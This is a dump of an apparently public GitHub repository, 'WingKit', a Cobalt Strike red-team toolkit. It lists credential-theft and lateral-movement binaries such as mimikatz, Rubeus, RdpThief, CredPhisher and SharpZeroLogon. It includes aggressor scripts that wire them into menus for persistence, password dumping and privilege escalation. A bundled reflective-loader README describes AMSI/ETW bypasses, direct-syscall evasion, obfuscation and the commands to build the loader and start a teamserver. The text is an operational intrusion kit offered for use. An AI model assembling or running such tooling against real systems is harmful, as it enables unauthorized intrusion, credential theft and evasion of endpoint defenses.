├── .gitignore ├── README.md ├── Wing.cna ├── bof ├── README.md ├── zerologon.x64.o └── zerologon.x86.o ├── dll ├── .DS_Store ├── hashdump.x64.dll ├── mimikatz.dll └── powerkatz_x64.dll ├── exe ├── CertKatz.exe ├── CleanRunMRU.exe ├── CloneVault.exe ├── CredPhisher.exe ├── DecryptAutoLogon.exe ├── InternalMonologue.exe ├── Net-GPPPassword.exe ├── PowerView.ps1 ├── README.md ├── RdpThief.dll ├── RdpThief_x64.tmp ├── Recon-AD-AllLocalGroups.dll ├── Recon-AD-Computers.dll ├── Recon-AD-Domain.dll ├── Recon-AD-Groups.dll ├── Recon-AD-LocalGroups.dll ├── Recon-AD-SPNs.dll ├── Recon-AD-Users.dll ├── Rubeus.exe ├── SafetyKatz.exe ├── SearchSessions.exe ├── Seatbelt.exe ├── SharpCOM.exe ├── SharpChromium.exe ├── SharpClipboard.exe ├── SharpHound.exe ├── SharpHound.ps1 ├── SharpKatz.exe ├── SharpMapExec.exe ├── SharpRelay.exe ├── SharpSQLTools.exe ├── SharpSecDump.exe ├── SharpSniper.exe ├── SharpStay.exe ├── SharpUp.exe ├── SharpView.exe ├── SharpWMI.exe ├── SharpWeb.exe ├── SharpWifiGrabber.exe ├── SharpZeroLogon.exe ├── SpoolSample.exe ├── SpoolTrigger.x64.dll ├── SpoolTrigger.x86.dll ├── StandIn.exe ├── Tokenvator.exe ├── Watson.exe ├── WinDivert64.sys ├── dazzleUP_Reflective_DLL.dll ├── locksreen.exe ├── pickl3_reflective_dll_x64.dll └── reflective_dll.dll ├── github ├── CobaltStrikeReflectiveLoader │ ├── README.md │ ├── ReflectiveLoader.c │ ├── bin │ │ └── ReflectiveLoader.x64.o │ ├── compile-x64.sh │ ├── images │ │ ├── CreateBeaconStageless.png │ │ ├── beaconCreateSuccess.png │ │ ├── bobsBeacon.png │ │ ├── loadRdllScriptMenu.png │ │ └── top.png │ ├── rdll_loader.cna │ └── versions │ │ ├── ReflectiveLoader-v0_1.c │ │ ├── ReflectiveLoader-v0_2.c │ │ ├── ReflectiveLoader-v0_3.c │ │ ├── ReflectiveLoader-v0_3_1.c │ │ ├── ReflectiveLoader-v0_4.c │ │ └── ReflectiveLoader-v0_5.c ├── WdToggle │ ├── Makefile │ ├── README.md │ ├── Syscalls.h │ ├── WdToggle.c │ ├── WdToggle.h │ ├── WdToggle.o │ ├── WdToggle.png │ └── beacon.h └── ZeroLogon-BOF │ ├── LICENSE │ ├── dist │ ├── zerologon.cna │ ├── zerologon.x64.o │ └── zerologon.x86.o │ ├── make.bat │ └── src │ ├── beacon.h │ └── zerologon.c └── scripts ├── DefenderAV.cna ├── Initial_Access.cna ├── Lateral-Movement.cna ├── PasswordDump.cna ├── Persistence.cna ├── Privilege.cna ├── README.md ├── bof └── zerologon.cna ├── cmd ├── AV.cna ├── FilesColor.cna ├── Highlight_Beacons.cna ├── ProcessColor.cna ├── RdpThief.cna ├── Recon-AD.cna ├── SharpZeroLogon_alias.cna ├── Spool.cna ├── SpoolSample.cna ├── clipboard_monitor.cna ├── coffee.cna ├── cwd-in-beacon-status-bar.cna ├── dazzleUP.cna ├── dingding.cna ├── frp.cna ├── internal-monologue_alias.cna ├── leave_no_trace.cna ├── rubeus_alias.cna ├── safetykatz_alias.cna ├── sessionsearcher_alias.cna ├── sharpcom_alias.cna ├── sharpmapexec_alias.cna ├── sharprelay_alias.cna ├── sharpsniper_alias.cna ├── sharpsqltools_alias.cna ├── sharpup_alias.cna ├── sharpview_alias.cna ├── standin_alias.cna ├── test.cna ├── upload.cna └── watson_alias.cna └── demo.cna /.gitignore: -------------------------------------------------------------------------------- 1 | exe/Xshell.exe 2 | dll/clearpass.x64.dll 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## 前言 2 | 3 | 4 | > 现在很少用CS了,就把之前自己日常整理用的Kit分享一下。 5 | 6 | ## WingKit 7 | ### 信息收集 8 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049440891-d4b74954-6c73-424a-9e7e-380cd7f721fc.png#clientId=u2f88f3e2-eadd-4&from=paste&height=607&id=uc7ab3642&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1214&originWidth=2046&originalType=binary&ratio=1&size=206387&status=done&style=none&taskId=u90c29727-715f-4f27-b7d6-6e2410043cc&width=1023) 9 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049544523-10a1331f-9441-4ea9-ad20-29c55135cd12.png#clientId=u2f88f3e2-eadd-4&from=paste&height=608&id=u6cd33c63&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1216&originWidth=1830&originalType=binary&ratio=1&size=143619&status=done&style=none&taskId=u977aa81b-2eac-4d5a-b68e-62e11520502&width=915) 10 | ## 权限维持 11 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049570968-0335803f-3dd2-4db6-88ec-cfbe3279b26a.png#clientId=u2f88f3e2-eadd-4&from=paste&height=637&id=u6cb6d327&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1274&originWidth=1894&originalType=binary&ratio=1&size=168907&status=done&style=none&taskId=u76119c68-85b5-4100-a615-f537ed504ce&width=947) 12 | ## Cred Access 13 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/370919/1635049604119-01025926-7870-4701-a997-cfcfd0323db7.png#clientId=u2f88f3e2-eadd-4&from=paste&height=625&id=uf207e1ce&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1250&originWidth=1742&originalType=binary&ratio=1&size=197655&status=done&style=none&taskId=uab876b12-d710-48bb-81b4-5303b377836&width=871) 14 | 15 | 16 | ## 参考 17 | [https://github.com/josephkingstone/cobalt_strike_extension_kit/tree/3.0](https://github.com/josephkingstone/cobalt_strike_extension_kit/tree/3.0) 18 | ​ 19 | 20 | -------------------------------------------------------------------------------- /Wing.cna: -------------------------------------------------------------------------------- 1 | ################################## 2 | # # 3 | # WingKit # 4 | # # 5 | ################################## 6 | 7 | @rootpath = "/Users/wing/RedTeamWing/RedTeamTookit/06-C2/"; 8 | @cmdpath = @rootpath."WingKit/scripts/cmd"; 9 | println(@cmdpath); 10 | @aggressor = ls(@cmdpath); 11 | println("[+] 正在导入命令行插件:"); 12 | foreach $file (@aggressor){ 13 | include($file); 14 | println("$file"); 15 | } 16 | 17 | # 导入github的一些插件 18 | # include(script_resource("github/CSSG/CSSG_load.cna")); 19 | 20 | # 主菜单 21 | popup beacon_top{ 22 | menu "WingKit"{ 23 | menu "Initial Access"{ 24 | include(script_resource("scripts/Initial_Access.cna")); 25 | } 26 | menu "DefenderAV"{ 27 | include(script_resource("scripts/DefenderAV.cna")); 28 | } 29 | menu "权限维持"{ 30 | include(script_resource("scripts/Persistence.cna")); 31 | } 32 | menu "密码一把梭"{ 33 | include(script_resource("scripts/PasswordDump.cna")); 34 | } 35 | menu "权限提升"{ 36 | include(script_resource("scripts/Privilege.cna")); 37 | } 38 | menu "横向移动"{ 39 | include(script_resource("scripts/Lateral-Movement.cna")); 40 | } 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /bof/README.md: -------------------------------------------------------------------------------- 1 | ## README 2 | 这个目录存放所有的bof -------------------------------------------------------------------------------- /bof/zerologon.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/bof/zerologon.x64.o -------------------------------------------------------------------------------- /bof/zerologon.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/bof/zerologon.x86.o -------------------------------------------------------------------------------- /dll/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/.DS_Store -------------------------------------------------------------------------------- /dll/hashdump.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/hashdump.x64.dll -------------------------------------------------------------------------------- /dll/mimikatz.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/mimikatz.dll -------------------------------------------------------------------------------- /dll/powerkatz_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/dll/powerkatz_x64.dll -------------------------------------------------------------------------------- /exe/CertKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CertKatz.exe -------------------------------------------------------------------------------- /exe/CleanRunMRU.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CleanRunMRU.exe -------------------------------------------------------------------------------- /exe/CloneVault.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CloneVault.exe -------------------------------------------------------------------------------- /exe/CredPhisher.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/CredPhisher.exe -------------------------------------------------------------------------------- /exe/DecryptAutoLogon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/DecryptAutoLogon.exe -------------------------------------------------------------------------------- /exe/InternalMonologue.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/InternalMonologue.exe -------------------------------------------------------------------------------- /exe/Net-GPPPassword.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Net-GPPPassword.exe -------------------------------------------------------------------------------- /exe/README.md: -------------------------------------------------------------------------------- 1 | ## Tool List 2 | 这个目录存放所有exe 3 | 4 | - Seatbelt 5 | 信息收集 -------------------------------------------------------------------------------- /exe/RdpThief.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/RdpThief.dll -------------------------------------------------------------------------------- /exe/RdpThief_x64.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/RdpThief_x64.tmp -------------------------------------------------------------------------------- /exe/Recon-AD-AllLocalGroups.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-AllLocalGroups.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Computers.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Computers.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Domain.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Domain.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Groups.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Groups.dll -------------------------------------------------------------------------------- /exe/Recon-AD-LocalGroups.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-LocalGroups.dll -------------------------------------------------------------------------------- /exe/Recon-AD-SPNs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-SPNs.dll -------------------------------------------------------------------------------- /exe/Recon-AD-Users.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Recon-AD-Users.dll -------------------------------------------------------------------------------- /exe/Rubeus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Rubeus.exe -------------------------------------------------------------------------------- /exe/SafetyKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SafetyKatz.exe -------------------------------------------------------------------------------- /exe/SearchSessions.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SearchSessions.exe -------------------------------------------------------------------------------- /exe/Seatbelt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Seatbelt.exe -------------------------------------------------------------------------------- /exe/SharpCOM.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpCOM.exe -------------------------------------------------------------------------------- /exe/SharpChromium.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpChromium.exe -------------------------------------------------------------------------------- /exe/SharpClipboard.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpClipboard.exe -------------------------------------------------------------------------------- /exe/SharpHound.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpHound.exe -------------------------------------------------------------------------------- /exe/SharpKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpKatz.exe -------------------------------------------------------------------------------- /exe/SharpMapExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpMapExec.exe -------------------------------------------------------------------------------- /exe/SharpRelay.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpRelay.exe -------------------------------------------------------------------------------- /exe/SharpSQLTools.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpSQLTools.exe -------------------------------------------------------------------------------- /exe/SharpSecDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpSecDump.exe -------------------------------------------------------------------------------- /exe/SharpSniper.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpSniper.exe -------------------------------------------------------------------------------- /exe/SharpStay.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpStay.exe -------------------------------------------------------------------------------- /exe/SharpUp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpUp.exe -------------------------------------------------------------------------------- /exe/SharpView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpView.exe -------------------------------------------------------------------------------- /exe/SharpWMI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpWMI.exe -------------------------------------------------------------------------------- /exe/SharpWeb.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpWeb.exe -------------------------------------------------------------------------------- /exe/SharpWifiGrabber.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpWifiGrabber.exe -------------------------------------------------------------------------------- /exe/SharpZeroLogon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SharpZeroLogon.exe -------------------------------------------------------------------------------- /exe/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SpoolSample.exe -------------------------------------------------------------------------------- /exe/SpoolTrigger.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SpoolTrigger.x64.dll -------------------------------------------------------------------------------- /exe/SpoolTrigger.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/SpoolTrigger.x86.dll -------------------------------------------------------------------------------- /exe/StandIn.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/StandIn.exe -------------------------------------------------------------------------------- /exe/Tokenvator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Tokenvator.exe -------------------------------------------------------------------------------- /exe/Watson.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/Watson.exe -------------------------------------------------------------------------------- /exe/WinDivert64.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/WinDivert64.sys -------------------------------------------------------------------------------- /exe/dazzleUP_Reflective_DLL.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/dazzleUP_Reflective_DLL.dll -------------------------------------------------------------------------------- /exe/locksreen.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/locksreen.exe -------------------------------------------------------------------------------- /exe/pickl3_reflective_dll_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/pickl3_reflective_dll_x64.dll -------------------------------------------------------------------------------- /exe/reflective_dll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/exe/reflective_dll.dll -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/README.md: -------------------------------------------------------------------------------- 1 | # Cobalt Strike User-Defined Reflective Loader 2 | Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities. 3 | 4 | ![](/images/top.png) 5 | 6 | + Based on Stephen Fewer's incredible Reflective Loader project: 7 | + https://github.com/stephenfewer/ReflectiveDLLInjection 8 | + Created while working through Renz0h's Reflective DLL videos from the [Sektor7 Malware Developer Intermediate (MDI) Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/) 9 | 10 | ## Versions 11 | + Different version of this User-Defined Reflective Loader project can be found in the versions folder 12 | 13 | 14 | | Version | File | Description | 15 | |:-------:|:-----|:------------| 16 | |0.5|ReflectiveLoader-v0_5.c| Added HellsGate & HalosGate direct syscaller, replaced allot of ASM stubs, code refactor, and ~500 bytes smaller. Credit to @SEKTOR7net the jedi HalosGate creator & @smelly__vx & @am0nsec Creators/Publishers of the Hells Gate technique! Credit to @ilove2pwn_ for recommending removing ASM Stubs! Haven't got all of them, but will keep working at it :) | 17 | |0.4|ReflectiveLoader-v0_4.c| AMSI & ETW bypasses baked into reflective loader. Can disable by commenting #define BYPASS line when compiling. Credit to @mariuszbit for the awesome idea. Credit to @\_xpn\_ + @offsectraining + @ajpc500 for their research and code | 18 | |0.3.1|ReflectiveLoader-v0_3_1.c| Changed strings from wchar to char and unpack them to unicode with MMX registers. Fixes linux compilation error discovered by @mariuszbit | 19 | |0.3|ReflectiveLoader-v0_3.c| String obfuscation using new technique. | 20 | |0.2|ReflectiveLoader-v0_2.c| Checks the Loader to see if dependent DLL's already exist to limit times LoadLibrary() is called, custom GetSymbolAddress function to reduce calls to GetProcAddress(), and code refactor. | 21 | |0.1|ReflectiveLoader-v0_1.c| This is the original reflective loader created for this project. It includes the notes within the C file. This initial version was created with research and learning in mind. Little obfuscation and evasion techniques are used in this version.| 22 | 23 | ## Initial Project Goals 24 | + Learn how Reflective Loader works. 25 | + Write a Reflective Loader in Assembly. 26 | + Compatible with Cobalt Strike. 27 | + Cross compile from macOS/Linux. 28 | + Implement Inline-Assembly into a C project. 29 | 30 | ## Future Project Goals 31 | + Use the initial project as a template for more advanced evasion techniques leveraging the flexibility of Assembly. 32 | + Implement Cobalt Strike options such as no RWX, stompPE, module stomping, changing the MZ header, etc. 33 | + Write a decent Aggressor script. 34 | + Support x86. 35 | + Have different versions of reflective loader to choose from. 36 | + Implement HellsGate/HalosGate for the initial calls that reflective loader uses (pNtFlushInstructionCache, VirtualAlloc, GetProcAddress, LoadLibraryA, etc). 37 | + Optimize the assembly code. 38 | + Hash/obfuscate strings. 39 | + Some kind of template language overlay that can modify/randomize the registers/methods. 40 | 41 | ## Usage 42 | 1. Start your Cobalt Strike Team Server with or without a profile 43 | + At the moment I've only tested without a profile and with a few profiles generated from [Tylous's epic SourcePoint project](https://github.com/Tylous/SourcePoint) 44 | ```bash 45 | #### This profile stuff below is optional, but this is the profile I tested this Reflective Loader with #### 46 | # Install Go on Kali if you need it 47 | sudo apt install golang-go -y 48 | # Creating a Team Server Cobalt Strike profile with SourcePoint 49 | ## Clone the SourcePoint project 50 | git clone https://github.com/Tylous/SourcePoint.git 51 | ## Build SourcePoint Go project 52 | cd SourcePoint 53 | go build SourcePoint.go 54 | ## Run it with some cool flags (look at the help menu for more info) 55 | ### This is the settings I have tested UD Reflective Loader with 56 | ./SourcePoint -PE_Clone 18 -PostEX_Name 13 -Sleep 3 -Profile 4 -Outfile myprofile.profile -Host -Injector NtMapViewOfSection 57 | ## Start Team Server 58 | cd ../ 59 | sudo ./teamserver 'T3@Ms3Rv3Rp@$$w0RD' SourcePoint/myprofile.profile 60 | ``` 61 | 2. Go to your Cobalt Strike GUI and import the rdll_loader.cna Agressor script. 62 | ![](/images/loadRdllScriptMenu.png) 63 | 3. Generate your x64 payload (Attacks -> Packages -> Windows Executable (S)) 64 | + Does not support x86 option. The x86 bin is the original Reflective Loader object file. 65 | ![](/images/CreateBeaconStageless.png) 66 | 4. Use the Script Console to make sure that the beacon created successfully with this User-Defined Reflective Loader 67 | + If successful, the output in the Script Console will look like this: 68 | ![](/images/beaconCreateSuccess.png) 69 | 70 | ## Build (Only tested from macOS at the moment) 71 | 1. Run the compile-x64.sh shell script after installling required dependencies 72 | ```bash 73 | # Install brew on macOS if you need it (https://brew.sh/) 74 | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 75 | # Install Ming using Brew 76 | brew install mingw-w64 77 | # Clone this Reflective DLL project from this github repo 78 | git clone https://github.com/boku7/CobaltStrikeReflectiveLoader.git 79 | # Compile the ReflectiveLoader Object file 80 | cd CobaltStrikeReflectiveLoader/ 81 | cat compile-x64.sh 82 | x86_64-w64-mingw32-gcc -c ReflectiveLoader.c -o ./bin/ReflectiveLoader.x64.o -shared -masm=intel 83 | bash compile-x64.sh 84 | ``` 85 | 2. Follow "Usage" instructions 86 | 87 | ## Credits / References 88 | ### Reflective Loader 89 | + https://github.com/stephenfewer/ReflectiveDLLInjection 90 | + 100% recommend these videos if you're interested in Reflective DLL: 91 | + [Dancing with Import Address Table (IAT) - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463262-pe-madness/1435207-dancing-with-iat) 92 | + [Walking through Export Address Table - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463262-pe-madness/1435189-walking-through-export-address-table) 93 | + [Reflective Injection Explained - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463258-reflective-dlls/1435355-reflective-injection-explained) 94 | + [ReflectiveLoader source review - Sektor 7 MDI Course](https://institute.sektor7.net/courses/rto-maldev-intermediate/463258-reflective-dlls/1435383-reflectiveloader-source-review) 95 | ### HalosGate SysCaller 96 | + Reenz0h from @SEKTOR7net 97 | + Most of the C techniques I use are from Reenz0h's awesome courses and blogs 98 | + Best classes for malware development out there. 99 | + Creator of the halos gate technique. His work was the motivation for this work. 100 | + [Sektor7 HalosGate Blog](https://blog.sektor7.net/#!res/2021/halosgate.md) 101 | ### HellsGate Syscaller 102 | + @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique ) 103 | + Could not have made my implementation of HellsGate without them :) 104 | + Awesome work on this method, really enjoyed working through it myself. Thank you! 105 | + https://github.com/am0nsec/HellsGate 106 | + Link to the [Hell's Gate paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf](https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf) 107 | ### Cobalt Strike User Defined Reflective Loader 108 | + https://www.cobaltstrike.com/help-user-defined-reflective-loader 109 | ### Great Resource for learning Intel ASM 110 | + [Pentester Academy - SLAE64](https://www.pentesteracademy.com/course?id=7) 111 | ### ETW and AMSI Bypass 112 | + @mariuszbit - for awesome idea to implement bypasses in reflective loader! 113 | + [@_XPN_ Hiding Your .NET – ETW](https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/) 114 | + [ajpc500/BOFs](https://github.com/ajpc500/BOFs/) 115 | + [Offensive Security OSEP](https://www.offensive-security.com/pen300-osep/) 116 | ### Implementing ASM in C Code with GCC 117 | + https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/ 118 | + https://www.cs.uaf.edu/2011/fall/cs301/lecture/10_12_asm_c.html 119 | + http://gcc.gnu.org/onlinedocs/gcc-4.0.2/gcc/Extended-Asm.html#Extended-Asm 120 | ### Cobalt Strike C2 Profile Generator 121 | + [Tylous's epic SourcePoint project](https://github.com/Tylous/SourcePoint) 122 | -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/bin/ReflectiveLoader.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/bin/ReflectiveLoader.x64.o -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/compile-x64.sh: -------------------------------------------------------------------------------- 1 | x86_64-w64-mingw32-gcc -c ReflectiveLoader.c -o ./bin/ReflectiveLoader.x64.o -shared -masm=intel 2 | -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/CreateBeaconStageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/CreateBeaconStageless.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/beaconCreateSuccess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/beaconCreateSuccess.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/bobsBeacon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/bobsBeacon.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/loadRdllScriptMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/loadRdllScriptMenu.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/images/top.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/top.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/rdll_loader.cna: -------------------------------------------------------------------------------- 1 | # User Defined Reflective Loader Kit Aggressor Script 2 | sub generate_my_dll { 3 | local('$handle $data $loader $temp_dll'); 4 | # --------------------------------------------------------------------- 5 | # Load a object file that contains a Reflective Loader. 6 | # The architecture ($3) is used in the path. 7 | # --------------------------------------------------------------------- 8 | $handle = openf(script_resource("/bin/ReflectiveLoader.x64.o")); 9 | $data = readb($handle, -1); 10 | closef($handle); 11 | warn("Loaded Length: " . strlen($data)); 12 | if (strlen($data) eq 0) { 13 | warn("Error loading reflective loader object file - Reverting to using default 